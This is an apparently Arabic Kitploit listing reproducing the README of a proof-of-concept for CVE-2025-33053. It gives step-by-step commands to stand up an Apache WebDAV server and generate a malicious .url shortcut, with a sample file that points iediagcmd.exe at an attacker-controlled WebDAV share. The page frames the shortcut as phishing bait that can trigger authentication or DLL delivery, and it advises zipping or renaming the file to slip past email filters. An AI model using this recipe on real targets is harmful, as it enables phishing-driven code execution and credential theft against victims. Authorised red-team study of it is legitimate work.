Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-33053-Proof-Of-Concept — CVE-2025-33053 إثبات المفهوم (PoC) | Kitploit
أدوات/GitHubGitHub/devbuihieu/cve-2025-33053-proof-of-concept
توليد الحمولةالاستغلالالحركة الجانبيةالتصيد الاحتياليأمن الويباختبار الاختراقالقيادة والسيطرةالهندسة الاجتماعيةالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubdevbuihieu/cve-2025-33053-proof-of-concept

CVE-2025-33053-Proof-Of-Concept

CVE-2025-33053 إثبات المفهوم (PoC)

عرض المستودع
6416منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2025-33053 إثبات المفهوم

يوفر هذا المستودع نصوصًا برمجية لنشر خادم WebDAV تلقائيًا على Ubuntu باستخدام Apache2، وإنشاء ملفات اختصارات .url خبيثة لاستخدامها في التصيد الاحتيالي، اختبار الفريق الأحمر، أو محاكاة الحركة الجانبية.


📁 المحتويات

  • setup_webdav.sh – نص برمجي Bash لإعداد Apache2 + WebDAV.
  • setup_webdav.py – نسخة Python مما سبق.
  • gen_url.py – نص برمجي Python لإنشاء ملفات اختصارات .url بمسارات UNC/WebDAV.
  • README.md – التوثيق.

🔧 المتطلبات

  • نظام التشغيل: Ubuntu 20.04 أو أحدث (متوافق مع Debian)
  • صلاحيات الجذر (sudo)
  • Python 3.x

🚀 تعليمات الإعداد

1. خادم WebDAV (عبر Bash)

root@kitploit:~
sudo bash setup_webdav.sh

أو باستخدام Python:

root@kitploit:~
sudo python3 setup_webdav.py

بشكل افتراضي، سيقوم النص البرمجي بما يلي:

  • تثبيت Apache ووحدات WebDAV المطلوبة.
  • إنشاء دليل مشترك في /var/www/webdav.
  • تفعيل وحدتي DAV وDAV_FS.
  • إنشاء دليل DavLockDB (لمنع أخطاء قفل Apache DAV).
  • إعادة تشغيل خدمة Apache.

📎 مسار WebDAV: http://<your-ip>/webdav/


💣 إنشاء اختصار .url خبيث

مثال على الاستخدام:

root@kitploit:~
python3 gen_url.py --ip 192.168.1.100 --out doc.url

جميع الخيارات:

root@kitploit:~
python3 gen_url.py \
  --ip 《YOUR IP ADDRESS》\
  --share 《YOUR SHARE NAME》(Default: webdav) \
  --out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
  --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
  --icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
  --index 13 \
  --modified 20F06BA06D07BD014D

سينشئ هذا ملف .url مثل:

root@kitploit:~
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

📌 قد يؤدي النقر على هذا الملف (في بعض الإعدادات) إلى اتصال النظام الهدف تلقائيًا بخادم WebDAV الخاص بك (مصادقة أو تسليم DLL).


🔒 ملاحظات لاختبار الأمان

  • عطّل جدار الحماية (أو افتح المنفذ 80) إذا كنت تختبر على شبكة محلية:

    root@kitploit:~
    sudo ufw allow 80
    
  • قد لا يتم تنفيذ ملفات .url كما هو متوقع اعتمادًا على:

    • قيود نهج المجموعة
    • الإعدادات الافتراضية للتطبيقات
    • عميل البريد الإلكتروني (قد يقوم Gmail بتعقيمها)
  • قد تحتاج إلى ضغط ملف .url أو إعادة تسميته إلى .txt لتجاوز عوامل التصفية.


⚠️ إخلاء مسؤولية قانوني

هذا المستودع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط.
لا تستخدم هذه النصوص البرمجية ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها.


🧠 المراجع

  • إعداد خادم WebDAV - LinuxConfig.org
  • إعداد Apache لخادم WebDAV - Peter Girnus
  • وثائق Microsoft WebDAV

📬 تواصل

للأسئلة أو طلبات اختبار الفريق الأحمر الأخلاقي، تواصل عبر GitHub Issues.

تنزيل الأداة